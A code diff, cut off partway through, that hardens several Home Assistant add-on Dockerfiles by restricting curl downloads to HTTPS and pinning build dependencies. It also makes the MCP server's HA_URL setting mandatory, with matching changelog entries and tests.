--- a/localai/Dockerfile
+++ b/localai/Dockerfile
@@ -40,20 +40,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/mcp-server-extended/CHANGELOG.md
+++ b/mcp-server-extended/CHANGELOG.md
@@ -17,6 +17,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   now raises `ValueError: HA_URL environment variable must be set`.
 - renamed the internal `_check_ha_token` guard to `_check_ha_config`, which now validates both
   `HA_URL` and `HA_TOKEN`
+- added an autouse `ha_url` fixture to the test suite, since `HA_URL` no longer has a default and the
+  existing tests patch only `HA_TOKEN`; added a test covering the missing-`HA_URL` error
 
 ## [0.1.0] - 2024-01-XX
 

--- a/mcp-server-extended/CHANGELOG.md
+++ b/mcp-server-extended/CHANGELOG.md
@@ -5,6 +5,19 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [Unreleased]
+
+### Changed
+
+- **BREAKING CHANGE:** `HA_URL` is now required and no longer defaults to
+  `http://homeassistant.local:8123`. The old default hardcoded an unencrypted endpoint and, when
+  the variable was unset, silently sent requests — bearer token included — to a guessed host.
+  The add-on is unaffected because it always exports `HA_URL` from `config.yaml`; direct users of
+  the MCP server must set it explicitly, as `.docs/SETUP.md` already instructs. A missing value
+  now raises `ValueError: HA_URL environment variable must be set`.
+- renamed the internal `_check_ha_token` guard to `_check_ha_config`, which now validates both
+  `HA_URL` and `HA_TOKEN`
+
 ## [0.1.0] - 2024-01-XX
 
 ### Added

--- a/mcp-server-extended/Dockerfile
+++ b/mcp-server-extended/Dockerfile
@@ -49,20 +49,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \
@@ -70,10 +70,15 @@ RUN set -x \
 
 # Copy application files
 WORKDIR /app
-COPY pyproject.toml pdm.lock* ./
+# Listed explicitly rather than as `pdm.lock*`: a glob copies whatever else
+# happens to match at build time, which is how unintended files reach an image.
+COPY pyproject.toml pdm.lock ./
 COPY src/ ./src/
 
-# Install Python dependencies
+# Install Python dependencies.
+# `pdm` is pinned and restricted to wheels: an unpinned install resolves to
+# whatever is newest at build time, and a source distribution would execute
+# its own `setup.py` during the build.
 RUN set -x \
     && apk add --no-cache --virtual .build-deps \
          cargo \
@@ -83,7 +88,8 @@ RUN set -x \
          openssl-dev \
          python3-dev \
     && pip3 install --no-cache-dir --break-system-packages \
-         pdm \
+         --only-binary :all: \
+         pdm==2.28.2 \
     && pdm config python.use_venv false \
     && pdm install --prod --no-self \
     && apk del .build-deps \

--- a/mcp-server-extended/Dockerfile
+++ b/mcp-server-extended/Dockerfile
@@ -79,6 +79,14 @@ COPY src/ ./src/
 # `pdm` is pinned and restricted to wheels: an unpinned install resolves to
 # whatever is newest at build time, and a source distribution would execute
 # its own `setup.py` during the build.
+#
+# `msgpack` is the one exception. It reaches this tree through
+# `pdm -> hishel -> msgpack`, and it publishes musllinux wheels for aarch64,
+# x86_64 and riscv64 but none for armv7 — so under a blanket `--only-binary`
+# every `hishel` version becomes uninstallable and the armv7 build dies with
+# `ResolutionImpossible`. Allowing just this package to build from its sdist
+# keeps armv7 working (the toolchain above exists precisely for that) without
+# opening the whole dependency tree to arbitrary build-time code.
 RUN set -x \
     && apk add --no-cache --virtual .build-deps \
          cargo \
@@ -89,6 +97,7 @@ RUN set -x \
          python3-dev \
     && pip3 install --no-cache-dir --break-system-packages \
          --only-binary :all: \
+         --no-binary msgpack \
          pdm==2.28.2 \
     && pdm config python.use_venv false \
     && pdm install --prod --no-self \

--- a/mcp-server-extended/src/mcp_ha_extended/server.py
+++ b/mcp-server-extended/src/mcp_ha_extended/server.py
@@ -15,13 +15,20 @@ from mcp.server import Server
 from mcp.server.stdio import stdio_server
 from mcp.types import TextContent, Tool
 
-# Configuration
-HA_URL = os.getenv("HA_URL", "http://homeassistant.local:8123")
+# Configuration. HA_URL has no default: it used to fall back to
+# "http://homeassistant.local:8123", which hardcoded an unencrypted endpoint and
+# silently aimed requests — including the bearer token — at a guessed host when
+# the variable was missing. The add-on always supplies it from config.yaml, and
+# standalone users set it explicitly (see .docs/SETUP.md), so requiring it costs
+# nothing and turns a silent misconfiguration into a clear error.
+HA_URL = os.getenv("HA_URL", "")
 HA_TOKEN = os.getenv("HA_TOKEN", "")
 
 
-def _check_ha_token():
-    """Check if HA_TOKEN is set, raise error if not."""
+def _check_ha_config():
+    """Check that the Home Assistant URL and token are set, raise error if not."""
+    if not HA_URL:
+        raise ValueError("HA_URL environment variable must be set")
     if not HA_TOKEN:
         raise ValueError("HA_TOKEN environment variable must be set")
 
@@ -31,7 +38,7 @@ server = Server("home-assistant-automations")
 
 async def ha_api_call(method: str, endpoint: str, data: dict | None = None) -> dict:
     """Make an authenticated API call to Home Assistant."""
-    _check_ha_token()
+    _check_ha_config()
     url = f"{HA_URL}/api{endpoint}"
     headers = {
         "Authorization": f"Bearer {HA_TOKEN}",
@@ -291,7 +298,7 @@ async def call_tool(name: str, arguments: dict) -> Sequence[TextContent]:
 
 async def main():
     """Run the MCP server."""
-    _check_ha_token()
+    _check_ha_config()
     async with stdio_server() as (read_stream, write_stream):
         await server.run(
             read_stream,

--- a/mcp-server-extended/tests/test_server.py
+++ b/mcp-server-extended/tests/test_server.py
@@ -18,6 +18,19 @@ from mcp_ha_extended.server import (
 )
 
 
+@pytest.fixture(autouse=True)
+def ha_url():
+    """Give every test a valid HA_URL.
+
+    HA_URL has no default and is validated on each API call, so without this the
+    URL check fails before a test reaches the behaviour it is exercising. Tests
+    that specifically exercise a missing URL patch it themselves; the inner
+    patch wins over this one.
+    """
+    with patch("mcp_ha_extended.server.HA_URL", "http://test.local:8123"):
+        yield
+
+
 class TestHAAPICall:
     """Test the ha_api_call function."""
 
@@ -85,6 +98,13 @@ class TestHAAPICall:
         """Test API call without token raises error."""
         with patch("mcp_ha_extended.server.HA_TOKEN", ""):
             with pytest.raises(ValueError, match="HA_TOKEN"):
+                await ha_api_call("GET", "/test")
+
+    @pytest.mark.asyncio
+    async def test_ha_api_call_no_url(self):
+        """Test API call without URL raises error."""
+        with patch("mcp_ha_extended.server.HA_URL", ""):
+            with pytest.raises(ValueError, match="HA_URL"):
                 await ha_api_call("GET", "/test")
 
     @pytest.mark.asyncio

--- a/mealie/Dockerfile
+++ b/mealie/Dockerfile
@@ -44,20 +44,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/n8n/Dockerfile
+++ b/n8n/Dockerfile
@@ -45,20 +45,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/ntfy/Dockerfile
+++ b/ntfy/Dockerfile
@@ -40,20 +40,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/ollama-container/Dockerfile
+++ b/ollama-container/Dockerfile
@@ -46,20 +46,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/open-webui/Dockerfile
+++ b/open-webui/Dockerfile
@@ -42,20 +42,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/openclaw/Dockerfile
+++ b/openclaw/Dockerfile
@@ -45,20 +45,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/opencode/Dockerfile
+++ b/opencode/Dockerfile
@@ -47,20 +47,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \
@@ -77,7 +77,7 @@ RUN set -x \
            echo "OpenCode publishes no release asset for BUILD_ARCH='${BUILD_ARCH}'" >&2; \
            exit 1; \
        fi \
-    && curl -L -f -s -o /tmp/opencode.tar.gz \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /tmp/opencode.tar.gz \
          "https://github.com/opencode-ai/opencode/releases/download/v${OPENCODE_VERSION}/opencode-linux-${OC_ARCH}.tar.gz" \
     && tar xzf /tmp/opencode.tar.gz -C /usr/bin/ opencode \
     && chmod a+x /usr/bin/opencode \

--- a/piper-tts/Dockerfile
+++ b/piper-tts/Dockerfile
@@ -42,20 +42,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
